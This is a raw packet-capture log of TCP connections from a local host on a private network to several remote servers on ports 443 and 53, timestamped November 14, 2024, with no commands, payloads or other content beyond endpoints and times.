                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.535243988 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.535286903 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.539540052 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.539576054 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.539850950 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.540326118 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:34.540340900 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.167133093 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.167598009 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.167618036 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.168071032 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.168078899 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.225003958 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.225645065 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.225656986 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.226387024 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.226394892 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.235881090 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.236275911 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.236362934 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.236700058 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.236716032 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.266722918 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.274996996 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.275013924 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.276107073 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.276117086 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.301438093 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.301594973 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.301671028 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.301753044 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.301753044 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.301768064 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.301774979 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.306003094 CET49829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.306034088 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.306260109 CET49829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.306426048 CET49829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.306440115 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.352402925 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.352605104 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.352730989 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.352757931 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.352758884 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.352768898 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.352776051 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.355550051 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.355613947 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.355698109 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.355801105 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.355829954 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.364562988 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.364619017 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.364773035 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.364854097 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.364854097 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.364896059 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.364924908 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.366769075 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.366780043 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.366851091 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.367024899 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.367037058 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.402900934 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.403019905 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.403156042 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.403261900 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.403307915 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.403364897 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.403381109 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.405719995 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.405747890 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.405812979 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.405968904 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.405982971 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.519306898 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.519861937 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.519923925 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.520134926 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.520150900 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.654262066 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.654350042 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.654441118 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.654608965 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.654664993 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.654695988 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.654712915 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.657859087 CET49833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.657946110 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.658063889 CET49833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.658252954 CET49833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.658272982 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.661506891 CET4968353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.666960955 CET53496831.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.667146921 CET4968353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.667148113 CET4968353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.672338009 CET53496831.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.052881002 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.053467035 CET49829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.053499937 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.053793907 CET49829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.053802013 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.108058929 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.108640909 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.108726978 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.109040022 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.109055996 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.126018047 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.126399994 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.126411915 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.126737118 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.126744032 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.177607059 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.177970886 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.177997112 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.178302050 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.178308010 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.188148022 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.188312054 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.188389063 CET49829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.188424110 CET49829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.188431978 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.191293955 CET49684443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.191379070 CET4434968413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.191476107 CET49684443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.191637039 CET49684443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.191673994 CET4434968413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.237039089 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.237102032 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.237291098 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.237396002 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.237442017 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.237471104 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.237488985 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.239911079 CET49685443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.239934921 CET4434968513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.240010977 CET49685443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.240143061 CET49685443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.240154028 CET4434968513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.254741907 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.254945993 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.255049944 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.255089998 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.255096912 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.255112886 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.255119085 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.257580042 CET49686443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.257667065 CET4434968613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.257754087 CET49686443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.257896900 CET49686443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.257932901 CET4434968613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.269316912 CET53496831.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.269974947 CET4968353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.275063038 CET53496831.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.275125027 CET4968353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.309026957 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.309443951 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.309510946 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.309621096 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.309648037 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.309686899 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.309694052 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.317320108 CET49688443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.317414045 CET4434968813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.317593098 CET49688443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.317724943 CET49688443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.317750931 CET4434968813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.387635946 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.388266087 CET49833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.388326883 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.388853073 CET49833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.388868093 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.524434090 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.524612904 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.524811029 CET49833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.524811983 CET49833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.524894953 CET49833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.524931908 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.527678013 CET49689443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.527713060 CET4434968913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.527821064 CET49689443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.528016090 CET49689443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.528036118 CET4434968913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.937841892 CET4434968413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.938391924 CET49684443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.938429117 CET4434968413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.939193010 CET49684443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.939248085 CET4434968413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.981035948 CET4434968513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.981457949 CET49685443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.981471062 CET4434968513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.981950045 CET49685443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.981956959 CET4434968513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.998464108 CET4434968613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.998929977 CET49686443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.998955965 CET4434968613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.999819040 CET49686443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:36.999830961 CET4434968613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.066107988 CET4434968413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.066345930 CET4434968413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.066450119 CET49684443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.066534996 CET49684443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.066534996 CET49684443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.066576958 CET4434968413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.066603899 CET4434968413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.066615105 CET4434968813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.067338943 CET49688443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.067401886 CET4434968813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.068018913 CET49688443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.068032980 CET4434968813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.069901943 CET49690443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.069956064 CET4434969013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.070034981 CET49690443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.070209026 CET49690443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.070240021 CET4434969013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.113006115 CET4434968513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.113152981 CET4434968513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.113213062 CET49685443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.113320112 CET49685443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.113320112 CET49685443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.113332987 CET4434968513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.113339901 CET4434968513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.115891933 CET49691443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.115906954 CET4434969113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.115973949 CET49691443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.116141081 CET49691443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.116157055 CET4434969113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.129028082 CET4434968613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.129175901 CET4434968613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.129334927 CET49686443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.129334927 CET49686443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.129334927 CET49686443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.131747961 CET49692443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.131834030 CET4434969213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.131923914 CET49692443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.132085085 CET49692443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.132121086 CET4434969213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.196252108 CET4434968813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.196304083 CET4434968813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.196527958 CET49688443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.196559906 CET49688443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.196559906 CET49688443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.196573019 CET4434968813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.196584940 CET4434968813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.198775053 CET49693443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.198812962 CET4434969313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.198880911 CET49693443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.198978901 CET49693443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.198987007 CET4434969313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.248786926 CET49694443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.248872042 CET44349694142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.248959064 CET49694443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.249244928 CET49694443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.249281883 CET44349694142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.256905079 CET4434968913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.257320881 CET49689443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.257334948 CET4434968913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.257700920 CET49689443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.257708073 CET4434968913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.389266968 CET4434968913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.389410973 CET4434968913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.389482975 CET49689443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.389606953 CET49689443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.389617920 CET4434968913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.389631987 CET49689443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.389636993 CET4434968913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.392616987 CET49695443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.392653942 CET4434969513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.392734051 CET49695443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.392940998 CET49695443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.392956018 CET4434969513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.434825897 CET49686443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.434858084 CET4434968613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.804502010 CET4434969013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:37.805039883 CET49690443192.168.2.413.107.246.45
